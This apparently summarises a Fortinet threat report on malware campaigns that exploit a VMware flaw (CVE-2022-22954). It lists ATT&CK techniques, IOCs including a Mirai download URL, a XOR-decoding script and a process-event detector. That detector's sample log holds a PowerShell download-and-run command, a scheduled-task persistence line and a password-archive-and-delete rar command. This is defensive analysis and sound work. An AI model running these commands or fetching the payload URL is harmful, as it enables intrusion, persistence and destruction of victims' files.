Mirai, RAR1Ransom, and GuardMiner – Multiple Malware Campaigns Target VMware Vulnerability

VMware patched CVE-2022-22954 in April, but exploitation of the server-side template injection it describes, which yields remote code execution, continued against exposed VMware Workspace ONE Access and Identity Manager instances, delivering Mirai variants, RAR1Ransom, and GuardMiner payloads. Fortinet FortiGuard Labs details the post-exploitation behavior of each campaign, the malware involved, and the protections available.
#CVE-2022-22954 #Mirai #RAR1Ransom #GuardMiner #VMwareWorkspaceONEAccess

Keypoints

  • Patch status: CVE-2022-22954 was addressed in April, but exploitation attempts continued in the wild, enabling remote command execution.
  • Campaigns observed: In August, Mirai, RAR1Ransom, and GuardMiner payloads were deployed against exposed VMware services.
  • Mirai variant behavior: downloads a Mirai payload from a remote host, decodes its XOR-obfuscated configuration, and uses the C2 domain cnc.goodpackets.cc for tasking and heartbeats.
  • RAR1Ransom mechanics: drops the WinRAR command-line tool (rar.exe) and uses it to pack victim files into password-protected archives, drops a ransom note, and is staged by an initialization script (init.ps1) that also establishes persistence.
  • GuardMiner role: a cross-platform cryptominer (XMRig derivative) staged by init.sh on Linux and by additional dropped components such as networkmanager.exe on Windows, so one campaign spans both platforms.
  • Initial access and persistence: exploitation of the CVE for initial access, PowerShell and Unix shells for payload delivery, and scheduled tasks for persistence.
  • Defensive guidance: Fortinet provides IPS and antivirus detections and emphasizes patching and monitoring for suspicious processes.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Exploitation of CVE-2022-22954 leading to remote code execution on VMware Workspace ONE Access and Identity Manager.
  • [T1059.001] PowerShell – Windows payloads use PowerShell to download and execute scripts (init.ps1). ‘One leveraged PowerShell to download “init.ps1”’.
  • [T1059.004] Unix Shell – Linux deployment uses a shell script, init.sh, that is downloaded and executed on the compromised host. ‘init.sh’ downloaded and executed on Linux.
  • [T1105] Ingress Tool Transfer – Downloading payloads from remote servers (e.g., Mirai variant from http://107.189.8.21/pedalcheta/cutie.x86_64). ‘downloads Mirai variant from http[:]//107[.]189[.]8[.]21/pedalcheta/cutie[.]x86_64’.
  • [T1110] Brute Force – Brute-force functionality to guess credentials; decoded password lists show commonly used and IoT defaults. ‘The decoded passwords are listed below, they are commonly used passwords and also some default credentials for well-known IoT devices.’
  • [T1027] Obfuscated Files or Information – The Mirai variant's configuration is XOR-obfuscated; decoding it with the single-byte key 0x54 reveals the C2 host. ‘we XOR the data with 0x54 and get C2 server is “cnc[.]goodpackets[.]cc”’.
  • [T1486] Data Encrypted for Impact – RAR1Ransom encrypts user files with a password using WinRAR. ‘RAR1ransom drops “rar.exe” … to compress a victim’s files with a password.’
  • [T1053.005] Scheduled Task – Persistence by creating a scheduled task via init.ps1. ‘sustain persistence via creating scheduled task’.
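The T1027 entry above describes a single-byte XOR over the Mirai variant's configuration table. The script below is an added example (not code from the Fortinet report or from the malware): it decodes such a table with the key the report gives (0x54), and goes one step further by brute-forcing the key when it is unknown, scoring each candidate by how much the decoded entries look like hostnames and credentials. The sample blob is constructed here from the two domains named in the report plus placeholder passwords; its NUL-delimited layout is a simplification (real Mirai keeps its table as an array of length/pointer entries in the binary), so adapt the splitting step to the sample at hand.

```python
from __future__ import annotations

import re

# Single-byte XOR key the report gives for this Mirai variant's configuration table.
MIRAI_TABLE_KEY = 0x54

# Bytes we expect to see in a decoded hostname or credential entry.
SAFE_BYTES = frozenset(b"abcdefghijklmnopqrstuvwxyz0123456789.-_")
DOMAIN_RE = re.compile(r"^[a-z0-9-]+(?:\.[a-z0-9-]+)+$")


def xor_decode(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (symmetric, so it also encodes)."""
    return bytes(b ^ key for b in data)


def split_entries(decoded: bytes) -> list[bytes]:
    """Split a NUL-delimited decoded table into entries, dropping empty ones."""
    return [e for e in decoded.split(b"\x00") if e]


def decode_table(blob: bytes, key: int) -> list[str]:
    """Decode an obfuscated table with a known key and return its entries as text."""
    return [e.decode("ascii", errors="replace") for e in split_entries(xor_decode(blob, key))]


def score_key(blob: bytes, key: int) -> float:
    """Higher is better: share of 'safe' bytes across all entries, plus a bonus of 1.0
    when at least one entry parses as a domain name (the artefact we are hunting for)."""
    entries = split_entries(xor_decode(blob, key))
    if not entries:
        return 0.0
    total = sum(len(e) for e in entries)
    safe = sum(1 for e in entries for b in e if b in SAFE_BYTES)
    has_domain = any(DOMAIN_RE.match(e.decode("ascii", errors="replace")) for e in entries)
    return safe / total + (1.0 if has_domain else 0.0)


def recover_key(blob: bytes) -> int:
    """Brute-force the single-byte key: try all 256 values and keep the one whose
    decoded entries look most like hostnames and passwords."""
    return max(range(256), key=lambda k: score_key(blob, k))


def find_c2_candidates(entries: list[str]) -> list[str]:
    """Return decoded entries that look like domain names, in table order."""
    return [e for e in entries if DOMAIN_RE.match(e)]


# Constructed sample (not taken from a real binary): the C2 and backup domains named in
# the report plus placeholder credentials, NUL-delimited and XOR-encoded with 0x54.
_PLAINTEXT_TABLE = b"\x00".join(
    [b"cnc.goodpackets.cc", b"crustwebsites.net", b"root", b"admin", b"12345", b"default"]
) + b"\x00"
SAMPLE_BLOB = xor_decode(_PLAINTEXT_TABLE, MIRAI_TABLE_KEY)


if __name__ == "__main__":
    key = recover_key(SAMPLE_BLOB)
    entries = decode_table(SAMPLE_BLOB, key)
    c2 = find_c2_candidates(entries)
    print(f"recovered key: 0x{key:02x}")
    print("C2 candidates:", c2)
    print("remaining entries (credential list):", [e for e in entries if e not in c2])
```

The scoring deliberately does not rely on printable-ASCII ratio alone: XORing lowercase text with a small key often yields bytes that are still printable, so the raw ciphertext can score as well as the plaintext. Restricting the alphabet to hostname and credential characters and rewarding a domain-shaped entry makes the true key stand out.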

Indicators of Compromise

  • [Domain] C2 domain – cnc.goodpackets.cc, crustwebsites.net (used for command and control and backup links)
  • [IP Address] 107.189.8.21 – host for Mirai variant payload download
  • [SHA256] 66db83136c463441ea56fb1b5901c505bcd1ed52a73e23d7298f7055db2108d1, 4761e5d9bd3ebe647fbd7840b7d2d9c1334bde63d5f6b05a4ed89af7aa3a6eab (and 2 more hashes)
  • [Filename] READ_TO_DECRYPT.txt – ransom note dropped alongside encrypted files
  • [Filename] rar.exe – legitimate WinRAR command-line binary dropped by RAR1Ransom and abused to pack victim files into password-protected archives
  • [Filename] encrypt.exe – ransomware payload binary used to encrypt data
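The report's defensive guidance comes down to patching and watching for the processes these campaigns spawn. The script below is an added example (not Fortinet's detection content) that runs a few such checks over process-creation events: rar.exe adding files to a password-protected archive (RAR1Ransom's encryption step), PowerShell fetching init.ps1, schtasks.exe creating a task under a PowerShell parent, and the dropped file names listed above. The events are constructed JSON lines in a Sysmon-like shape; the command lines are assumptions about how the chain could look, not strings recovered from the malware. The WinRAR switches it keys on are real: -p<pwd> encrypts archive data and -hp<pwd> also encrypts headers.

```python
from __future__ import annotations

import json
import re

# Constructed process-creation events (not real telemetry). Field names loosely follow
# Sysmon Event ID 1; the command lines are assumptions, not strings taken from the malware.
SAMPLE_LOG = r"""
{"pid": 4012, "ppid": 1200, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmd": "powershell.exe -nop -w hidden -c \"Invoke-WebRequest http://example.invalid/init.ps1 -OutFile C:\\Users\\Public\\init.ps1; & C:\\Users\\Public\\init.ps1\""}
{"pid": 4020, "ppid": 4012, "image": "C:\\Windows\\System32\\schtasks.exe", "cmd": "schtasks.exe /create /tn Updater /tr \"powershell.exe -ep bypass -File C:\\Users\\Public\\init.ps1\" /sc minute /mo 30"}
{"pid": 4031, "ppid": 4012, "image": "C:\\Users\\Public\\encrypt.exe", "cmd": "encrypt.exe"}
{"pid": 4044, "ppid": 4031, "image": "C:\\Users\\Public\\rar.exe", "cmd": "rar.exe a -hpSecretPass -df C:\\Users\\victim\\Documents\\report.rar C:\\Users\\victim\\Documents\\report.docx"}
{"pid": 5001, "ppid": 900, "image": "C:\\Program Files\\WinRAR\\Rar.exe", "cmd": "Rar.exe a C:\\backup\\logs.rar C:\\logs\\*.log"}
"""

# File names the report associates with the campaigns; rar.exe is too common to list here.
KNOWN_DROPPED_NAMES = {"encrypt.exe", "networkmanager.exe"}

# WinRAR password switches -p<pwd> and -hp<pwd>. A bare "-p" only prompts and "-p-"
# disables passwords, so a non-empty password body is required.
RAR_PASSWORD_RE = re.compile(r"(?:^|\s)-(?:hp|p)[^\s-]\S*", re.IGNORECASE)
RAR_ADD_RE = re.compile(r"(?:^|\s)a(?:\s|$)")  # WinRAR's 'a' (add to archive) command
PS_DOWNLOAD_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|\bcurl\b|\bwget\b", re.IGNORECASE
)


def parse_events(log: str) -> list[dict]:
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in log.splitlines() if line.strip()]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events: list[dict]) -> list[tuple[str, int]]:
    """Return (rule, pid) pairs for events matching the behaviours the report describes."""
    by_pid = {e["pid"]: e for e in events}
    hits: list[tuple[str, int]] = []
    for e in events:
        name = basename(e["image"])
        cmd = e["cmd"]
        parent = by_pid.get(e["ppid"])
        parent_name = basename(parent["image"]) if parent else ""

        # T1486 as RAR1Ransom performs it: rar.exe adding files to a password-protected archive.
        if name == "rar.exe" and RAR_ADD_RE.search(cmd) and RAR_PASSWORD_RE.search(cmd):
            hits.append(("rar_password_archive", e["pid"]))

        # T1059.001 / T1105: PowerShell fetching init.ps1 from the network.
        if name == "powershell.exe" and re.search(r"init\.ps1", cmd, re.IGNORECASE) and PS_DOWNLOAD_RE.search(cmd):
            hits.append(("powershell_fetches_init_ps1", e["pid"]))

        # T1053.005: scheduled task created from a PowerShell parent (init.ps1's persistence step).
        if name == "schtasks.exe" and "/create" in cmd.lower() and parent_name == "powershell.exe":
            hits.append(("schtasks_create_from_powershell", e["pid"]))

        # Plain file-name indicators from the report.
        if name in KNOWN_DROPPED_NAMES:
            hits.append(("known_dropped_filename", e["pid"]))
    return hits


def process_chain(events: list[dict], pid: int) -> list[str]:
    """Image names from the given process up through its recorded ancestors, for triage."""
    by_pid = {e["pid"]: e for e in events}
    chain: list[str] = []
    seen: set[int] = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


if __name__ == "__main__":
    evts = parse_events(SAMPLE_LOG)
    for rule, pid in detect(evts):
        print(f"{rule:32s} pid={pid:<5d} chain={' <- '.join(process_chain(evts, pid))}")
```

The benign WinRAR event (pid 5001) shows why the rar.exe rule keys on the password switch rather than on the binary alone: archiving without a password is everyday administration, while archiving with a password and deleting the originals (-df) is the behaviour the report attributes to RAR1Ransom. The same pattern fits a Sigma rule or an EDR query once the field names are mapped to the real telemetry.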

Read more: https://www.fortinet.com/blog/threat-research/multiple-malware-campaigns-target-vmware-vulnerability